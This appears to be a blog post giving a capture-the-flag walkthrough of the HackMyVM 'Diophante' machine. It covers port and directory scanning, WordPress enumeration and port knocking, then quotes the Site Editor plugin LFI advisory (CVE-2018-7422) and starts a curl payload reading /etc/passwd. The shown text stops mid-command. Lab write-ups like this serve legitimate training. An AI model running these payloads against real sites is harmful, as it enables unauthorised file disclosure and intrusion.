{"id":873,"date":"2025-06-14T11:17:25","date_gmt":"2025-06-14T03:17:25","guid":{"rendered":"http:\/\/162.14.82.114\/?p=873"},"modified":"2025-06-14T11:17:25","modified_gmt":"2025-06-14T03:17:25","slug":"hmv-_-diophante","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/873\/06\/14\/2025\/","title":{"rendered":"hmv[-_-]Diophante"},"content":{"rendered":"<h1>Diophante<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116105.png\" alt=\"image-20250613212916590\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116107.png\" alt=\"image-20250614091814914\" 
\/><\/p>\n<h2>Information gathering<\/h2>\n<h3>Port scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nI scanned my computer so many times, it thinks we&#039;re dating.\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.10.107:22\nOpen 192.168.10.107:25\nOpen 192.168.10.107:80\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n|   2048 34:55:b2:c3:59:4e:b1:e5:dc:47:bb:73:f6:df:de:43 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC31MDow8cn4PkHzTyr6hHNjHWNqArCM26Eel8Tl1DxnZX56uuHi893mc\/+VVo75DqHnfU6etdZhCPeZ+5O3AS6iinLDT7vSlPd013+SHDU3gFHtvz76fLejnlnen4N7Vf37jYcfdF1EG9C7k017gDQc9Cby4\/QwGpXyrYAcLxmhO0odPDBQyULO\/gzzTkfyCJROF\/+vrr2AcX\/K4i9Sa9sE31FzDo1N\/bh0GOhlika1gB8KbBtcBDqWr0UpZIcbnQZZWQRCI9JpxRNhO3azk9kkh7gyJ\/Ul3rniU\/BgX1oQhJqVDACuMDlHDTud43MStiuOnC3OaTQqkrGAVAfwBOl\n|   256 5a:c3:b8:80:53:27:8f:b4:ef:27:89:c8:e5:a6:1f:81 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCok8Zb2Hn7EFxIGAbamuVBZEtn\/ZdRpDwrIRWK8pWua+Mcn69g9Ddrd7CC87isXqcfV2St0XtBstpKi+Pg9LvY=\n|   256 08:46:e6:ba:d3:64:31:88:e7:d3:66:94:ce:52:80:35 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG1XyCckVuVysYcnoiHoHkcDpY1TOfwJ3V+Gh9yGbUXR\n25\/tcp open  smtp    syn-ack ttl 64 Postfix smtpd\n| ssl-cert: Subject: commonName=debian\n| Subject Alternative Name: DNS:debian\n| Issuer: commonName=debian\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-04-07T07:11:28\n| Not valid after:  2031-04-05T07:11:28\n| MD5:   57e2:69bb:8411:97da:6ae7:23ec:682c:e1d7\n| SHA-1: e8cd:3c39:4301:4e53:99b6:ba02:3fea:04bd:a48b:0f66\n| -----BEGIN CERTIFICATE-----\n| MIIC0DCCAbigAwIBAgIUWq6t5x5ifQADHbAT1jP8zFP1HDAwDQYJKoZIhvcNAQEL\n| BQAwETEPMA0GA1UEAwwGZGViaWFuMB4XDTIxMDQwNzA3MTEyOFoXDTMxMDQwNTA3\n| MTEyOFowETEPMA0GA1UEAwwGZGViaWFuMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A\n| MIIBCgKCAQEArs5OM6mhTflVnLKiwC08GRsXSQidMlmFDJGECVtfwhdWJZlAaYju\n| u8g25w+1shV5jxa47PnSsfp7Jr2urVsPl1iAiqqrSC84nbrzhP5LpPD4wzFuOGak\n| 0U77Yb9mv1fX1AZNoEm4S5GTFvOMb2cfIbVbUFgX3vREMOAQUTyjX4+Bxns4\/1M\/\n| 
9sZweDdAUrgHscJu8o2v2tRTeW6wSQAbiRer0C9oExqOQHYaZzbaFwnEPyzCHdgO\n| 6zzIhGeX8xNcjE3YdjbW3+eVvE8QOEfScQoc0K1HFpUXtY2OsLGrUTkiGcFqV6zA\n| tVhP74FDfPyNue\/1bIhkogK7PbJT3ONgQwIDAQABoyAwHjAJBgNVHRMEAjAAMBEG\n| A1UdEQQKMAiCBmRlYmlhbjANBgkqhkiG9w0BAQsFAAOCAQEAMdm+7kAojV0ZLAGD\n| +a+tWQ8OiauOFfjUK9IGljJbKc0xujYWq6glJJHI4h2QF6CjxOBL5mPV5qt4JYvZ\n| yFWJvzWvjy0pDwgsm8OHL8sJydZrqBw1QjLWYnPHhpeKbiZO9W9mYkTC7r8aNreW\n| z7yF\/l7diFs8csEFvKnG9C3JtRgFo0C1baWn5GraecBut9E6QCdz0Ad\/Gqu30cEY\n| 6ArLC+jHkX4phDH0V5\/FJov0kctTdIlu0Oj+ItfvOel5ifn3tLIBEVmutvuHim6x\n| vrkdNkjdLmjgdKjm8y+vWHDDKn+Z\/sEHp8AXqJj7ynf3mE6RrQgTJLFG4R0R84n7\n| 9bqenw==\n|_-----END CERTIFICATE-----\n|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n|_ssl-date: TLS randomness does not represent time\n80\/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_  Supported Methods: HEAD OPTIONS\n|_http-title: Apache2 Debian Default Page: It works\nMAC Address: 08:00:27:7B:4E:08 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host:  debian; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php -s 200 301 302 -d 22&gt;\/dev\/null\n\n ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben &quot;epi&quot; Risher \ud83e\udd13                 ver: 
2.11.0\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url            \u2502 http:\/\/192.168.10.107\/\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c  Status Codes          \u2502 [200, 301, 302]\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.11.0\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83d\udcb2  Extensions            \u2502 [html, txt, php]\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion Depth       \u2502 22\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n^C                                                                                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w 
\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php -s 200 301 302 -d 2 2&gt;\/dev\/null\n\n301      GET        9l       28w      315c http:\/\/192.168.10.107\/blog =&gt; http:\/\/192.168.10.107\/blog\/\n200      GET      368l      933w    10701c http:\/\/192.168.10.107\/index.html\n200      GET       24l      126w    10356c http:\/\/192.168.10.107\/icons\/openlogo-75.png\n200      GET      368l      933w    10701c http:\/\/192.168.10.107\/\n301      GET        9l       28w      326c http:\/\/192.168.10.107\/blog\/wp-content =&gt; http:\/\/192.168.10.107\/blog\/wp-content\/\n200      GET      104l      522w     8227c http:\/\/192.168.10.107\/blog\/wp-login.php\n200      GET      384l     3177w    19915c http:\/\/192.168.10.107\/blog\/license.txt\n301      GET        9l       28w      327c http:\/\/192.168.10.107\/blog\/wp-includes =&gt; http:\/\/192.168.10.107\/blog\/wp-includes\/\n301      GET        0l        0w        0c http:\/\/192.168.10.107\/blog\/index.php =&gt; http:\/\/192.168.10.107\/blog\/\n200      GET      379l      746w     5972c http:\/\/192.168.10.107\/blog\/wp-admin\/css\/install.css\n200      GET       13l       78w     4373c http:\/\/192.168.10.107\/blog\/wp-admin\/images\/wordpress-logo.png\n302      GET        0l        0w        0c http:\/\/192.168.10.107\/blog\/wp-admin\/update-core.php =&gt; http:\/\/hard\/blog\/wp-login.php?redirect_to=http%3A%2F%2F192.168.10.107%2Fblog%2Fwp-admin%2Fupdate-core.php&amp;reauth=1\n302      GET        0l        0w        0c http:\/\/192.168.10.107\/blog\/wp-admin\/import.php =&gt; http:\/\/hard\/blog\/wp-login.php?redirect_to=http%3A%2F%2F192.168.10.107%2Fblog%2Fwp-admin%2Fimport.php&amp;reauth=1\n200      GET       17l       88w     1287c http:\/\/192.168.10.107\/blog\/wp-admin\/install.php\n200      GET       23l       86w     1248c http:\/\/192.168.10.107\/blog\/wp-admin\/upgrade.php\n302      GET        0l        0w        0c http:\/\/192.168.10.107\/blog\/wp-admin\/ =&gt; 
http:\/\/hard\/blog\/wp-login.php?redirect_to=http%3A%2F%2F192.168.10.107%2Fblog%2Fwp-admin%2F&amp;reauth=1\n200      GET       99l     1009w     8852c http:\/\/192.168.10.107\/blog\/readme.html\n200      GET        3l        6w       36c http:\/\/192.168.10.107\/note.txt\n200      GET        5l       15w      165c http:\/\/192.168.10.107\/blog\/wp-trackback.php\n301      GET        9l       28w      324c http:\/\/192.168.10.107\/blog\/wp-admin =&gt; http:\/\/192.168.10.107\/blog\/wp-admin\/\n302      GET        0l        0w        0c http:\/\/192.168.10.107\/blog\/wp-signup.php =&gt; http:\/\/hard\/blog\/wp-login.php?action=register<\/code><\/pre>\n<h3>wpscan scan<\/h3>\n<p>A rough look at the directory scan shows that this is a <code>wordpress<\/code> site.<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ wpscan --url http:\/\/$IP\/blog --api-token xxxxxxxxxxxxxxx\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | &#039;_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.28\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/192.168.10.107\/blog\/ [192.168.10.107]\n[+] Started: Fri Jun 13 21:31:19 2025\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.38 (Debian)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/192.168.10.107\/blog\/xmlrpc.php\n | Found By: 
Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/192.168.10.107\/blog\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/192.168.10.107\/blog\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/192.168.10.107\/blog\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 5.7 identified (Insecure, released on 2021-03-09).\n | Found By: Emoji Settings (Passive Detection)\n |  - http:\/\/192.168.10.107\/blog\/, Match: &#039;wp-includes\\\/js\\\/wp-emoji-release.min.js?ver=5.7&#039;\n | Confirmed By: Meta Generator (Passive Detection)\n |  - http:\/\/192.168.10.107\/blog\/, Match: &#039;WordPress 5.7&#039;\n |\n | [!] 44 vulnerabilities identified:\n |\n | [!] 
Title: WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8\n |     Fixed in: 5.7.1\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/cbbe6c17-b24e-4be4-8937-c78472a138b5\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-29447\n |      - https:\/\/wordpress.org\/news\/2021\/04\/wordpress-5-7-1-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/29378\n |      - https:\/\/blog.wpscan.com\/2021\/04\/15\/wordpress-571-security-vulnerability-release.html\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-rv47-pc52-qrhh\n |      - https:\/\/blog.sonarsource.com\/wordpress-xxe-security-vulnerability\/\n |      - https:\/\/hackerone.com\/reports\/1095645\n |      - https:\/\/www.youtube.com\/watch?v=3NBxcmqCgt4\n ---------------------\n  | [!] Title: WordPress &lt; 6.5.5 - Contributor+ Stored XSS in Template-Part Block\n |     Fixed in: 5.7.12\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/7c448f6d-4531-4757-bff0-be9e3220bbbb\n |      - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n |\n | [!] 
Title: WordPress &lt; 6.5.5 - Contributor+ Path Traversal in Template-Part Block\n |     Fixed in: 5.7.12\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/36232787-754a-4234-83d6-6ded5e80251c\n |      - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n\n[i] The main theme could not be detected.\n\n[+] Enumerating All Plugins (via Passive Methods)\n\n[i] No plugins Found.\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:00 &lt;==============================================================================================================&gt; (137 \/ 137) 100.00% Time: 00:00:00\n[i] No Config Backups Found.\n\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 1\n | Requests Remaining: 24\n\n[+] Finished: Fri Jun 13 21:31:29 2025\n[+] Requests Done: 142\n[+] Cached Requests: 29\n[+] Data Sent: 37.18 KB\n[+] Data Received: 46.259 KB\n[+] Memory used: 237.539 MB\n[+] Elapsed time: 00:00:09<\/code><\/pre>\n<p>Then I enumerated the users:<\/p>\n<pre><code class=\"language-bash\">[i] User(s) Identified:\n\n[+] sabine\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)<\/code><\/pre>\n<h2>Vulnerability discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<p>The landing page is just the default <code>Apache2 Debian Default Page<\/code>, so it looks like what we are after is not here.<\/p>\n<p><img 
src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116108.png\" alt=\"image-20250614093635581\" \/><\/p>\n<h3>knock<\/h3>\n<p>The directory scan turned up a hint:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ curl -s http:\/\/192.168.10.107\/note.txt\nDon&#039;t forget: 7000 8000 9000\n\nadmin<\/code><\/pre>\n<p>Knock on those ports:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ knock 7000 8000 9000\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.107:22\nOpen 192.168.10.107:25\nOpen 192.168.10.107:80\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n|   2048 34:55:b2:c3:59:4e:b1:e5:dc:47:bb:73:f6:df:de:43 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC31MDow8cn4PkHzTyr6hHNjHWNqArCM26Eel8Tl1DxnZX56uuHi893mc\/+VVo75DqHnfU6etdZhCPeZ+5O3AS6iinLDT7vSlPd013+SHDU3gFHtvz76fLejnlnen4N7Vf37jYcfdF1EG9C7k017gDQc9Cby4\/QwGpXyrYAcLxmhO0odPDBQyULO\/gzzTkfyCJROF\/+vrr2AcX\/K4i9Sa9sE31FzDo1N\/bh0GOhlika1gB8KbBtcBDqWr0UpZIcbnQZZWQRCI9JpxRNhO3azk9kkh7gyJ\/Ul3rniU\/BgX1oQhJqVDACuMDlHDTud43MStiuOnC3OaTQqkrGAVAfwBOl\n|   256 5a:c3:b8:80:53:27:8f:b4:ef:27:89:c8:e5:a6:1f:81 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCok8Zb2Hn7EFxIGAbamuVBZEtn\/ZdRpDwrIRWK8pWua+Mcn69g9Ddrd7CC87isXqcfV2St0XtBstpKi+Pg9LvY=\n|   256 08:46:e6:ba:d3:64:31:88:e7:d3:66:94:ce:52:80:35 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG1XyCckVuVysYcnoiHoHkcDpY1TOfwJ3V+Gh9yGbUXR\n25\/tcp open  smtp    syn-ack ttl 64 
Postfix smtpd\n| ssl-cert: Subject: commonName=debian\n| Subject Alternative Name: DNS:debian\n| Issuer: commonName=debian\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-04-07T07:11:28\n| Not valid after:  2031-04-05T07:11:28\n| MD5:   57e2:69bb:8411:97da:6ae7:23ec:682c:e1d7\n| SHA-1: e8cd:3c39:4301:4e53:99b6:ba02:3fea:04bd:a48b:0f66\n| -----BEGIN CERTIFICATE-----\n| MIIC0DCCAbigAwIBAgIUWq6t5x5ifQADHbAT1jP8zFP1HDAwDQYJKoZIhvcNAQEL\n| BQAwETEPMA0GA1UEAwwGZGViaWFuMB4XDTIxMDQwNzA3MTEyOFoXDTMxMDQwNTA3\n| MTEyOFowETEPMA0GA1UEAwwGZGViaWFuMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A\n| MIIBCgKCAQEArs5OM6mhTflVnLKiwC08GRsXSQidMlmFDJGECVtfwhdWJZlAaYju\n| u8g25w+1shV5jxa47PnSsfp7Jr2urVsPl1iAiqqrSC84nbrzhP5LpPD4wzFuOGak\n| 0U77Yb9mv1fX1AZNoEm4S5GTFvOMb2cfIbVbUFgX3vREMOAQUTyjX4+Bxns4\/1M\/\n| 9sZweDdAUrgHscJu8o2v2tRTeW6wSQAbiRer0C9oExqOQHYaZzbaFwnEPyzCHdgO\n| 6zzIhGeX8xNcjE3YdjbW3+eVvE8QOEfScQoc0K1HFpUXtY2OsLGrUTkiGcFqV6zA\n| tVhP74FDfPyNue\/1bIhkogK7PbJT3ONgQwIDAQABoyAwHjAJBgNVHRMEAjAAMBEG\n| A1UdEQQKMAiCBmRlYmlhbjANBgkqhkiG9w0BAQsFAAOCAQEAMdm+7kAojV0ZLAGD\n| +a+tWQ8OiauOFfjUK9IGljJbKc0xujYWq6glJJHI4h2QF6CjxOBL5mPV5qt4JYvZ\n| yFWJvzWvjy0pDwgsm8OHL8sJydZrqBw1QjLWYnPHhpeKbiZO9W9mYkTC7r8aNreW\n| z7yF\/l7diFs8csEFvKnG9C3JtRgFo0C1baWn5GraecBut9E6QCdz0Ad\/Gqu30cEY\n| 6ArLC+jHkX4phDH0V5\/FJov0kctTdIlu0Oj+ItfvOel5ifn3tLIBEVmutvuHim6x\n| vrkdNkjdLmjgdKjm8y+vWHDDKn+Z\/sEHp8AXqJj7ynf3mE6RrQgTJLFG4R0R84n7\n| 9bqenw==\n|_-----END CERTIFICATE-----\n|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n|_ssl-date: TLS randomness does not represent time\n80\/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_  Supported Methods: HEAD GET POST OPTIONS\n|_http-server-header: Apache\/2.4.38 (Debian)\n|_http-title: Apache2 Debian Default Page: It works\nMAC Address: 08:00:27:7B:4E:08 (PCS Systemtechnik\/Oracle VirtualBox 
virtual NIC)\nService Info: Host:  debian; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>Port <code>25<\/code> is open!<\/p>\n<h3>Plugin vulnerability=&gt;LFI<\/h3>\n<p>Check whether any vulnerabilities exist by enumerating the plugins:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ cmseek -u $IP\/blog\n\n___ _  _ ____ ____ ____ _  _\n|    |\\\/| [__  |___ |___ |_\/  by @r3dhax0r\n|___ |  | ___| |___ |___ | \\_ Version 1.1.3 K-RONA\n\n [+]  Deep Scan Results  [+] \n\n \u250f\u2501Target: 192.168.10.107\n \u2503\n \u2520\u2500\u2500 CMS: WordPress\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Version: 5.7\n \u2503    \u2570\u2500\u2500 URL: https:\/\/wordpress.org\n \u2503\n \u2520\u2500\u2500[WordPress Deepscan]\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 License file: http:\/\/192.168.10.107\/blog\/license.txt\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Plugins Enumerated: 1\n \u2503    \u2502    \u2502\n \u2503    \u2502    \u2570\u2500\u2500 Plugin: site-editor\n \u2503    \u2502        \u2502\n \u2503    \u2502        \u251c\u2500\u2500 Version: 4.3\n \u2503    \u2502        \u2570\u2500\u2500 URL: http:\/\/192.168.10.107\/blog\/wp-content\/plugins\/site-editor\n \u2503    \u2502\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Themes Enumerated: 1\n \u2503    \u2502    \u2502\n \u2503    \u2502    \u2570\u2500\u2500 Theme: twentynineteen\n \u2503    \u2502        \u2502\n \u2503    \u2502        \u251c\u2500\u2500 Version: 2.0\n \u2503    \u2502        \u2570\u2500\u2500 URL: http:\/\/192.168.10.107\/blog\/wp-content\/themes\/twentynineteen\n \u2503    \u2502\n \u2503\n \u2520\u2500\u2500 Result: \/home\/kali\/temp\/Diophante\/Result\/192.168.10.107_blog\/cms.json\n \u2503\n \u2517\u2501Scan Completed in 1.71 Seconds, using 45 Requests\n\n CMSeeK says ~ 
Annyeong<\/code><\/pre>\n<p>One plugin was found; check whether it has any known vulnerabilities:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116109.png\" alt=\"image-20250614095547471\" \/><\/p>\n<p>See how it is exploited:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ cat 44340.txt                                              \nProduct: Site Editor WordPress Plugin - https:\/\/wordpress.org\/plugins\/site-editor\/\nVendor: Site Editor\nTested version: 1.1.1\nCVE ID: CVE-2018-7422\n\n** CVE description **\nA Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php.\n\n** Technical details **\nIn site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP\u2019s require_once(). 
This parameter can be controlled by an attacker and is not properly sanitized.\n\nVulnerable code:\nif( isset( $_REQUEST[&#039;ajax_path&#039;] ) &amp;&amp; is_file( $_REQUEST[&#039;ajax_path&#039;] ) &amp;&amp; file_exists( $_REQUEST[&#039;ajax_path&#039;] ) ){\n    require_once $_REQUEST[&#039;ajax_path&#039;];\n}\n\nhttps:\/\/plugins.trac.wordpress.org\/browser\/site-editor\/trunk\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?rev=1640500#L5\n\nBy providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.\n\n** Proof of Concept **\nhttp:\/\/&lt;host&gt;\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/etc\/passwd\n\n** Solution **\nNo fix available yet.\n\n** Timeline **\n03\/01\/2018: author contacted through siteeditor.org&#039;s contact form; no reply\n16\/01\/2018: issue report filled on the public GitHub page with no technical details\n18\/01\/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us &quot;another&quot; e-mail\n19\/01\/2018: report sent; author says he will fix this issue &quot;very soon&quot;\n31\/01\/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply\n14\/02\/2018: WP Plugins team contacted; no reply\n06\/03\/2018: vendor contacted; no reply\n07\/03\/2018: vendor contacted; no reply\n15\/03\/2018: public disclosure\n\n** Credits **\nVulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).\n\n--\nBest Regards,\n\nNicolas Buzy-Debat\nOrange Cyberdefense Singapore (CERT-LEXSI)<\/code><\/pre>\n<p>Try the exploit:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ curl 
&quot;http:\/\/192.168.10.107\/blog\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/etc\/passwd&quot; --output 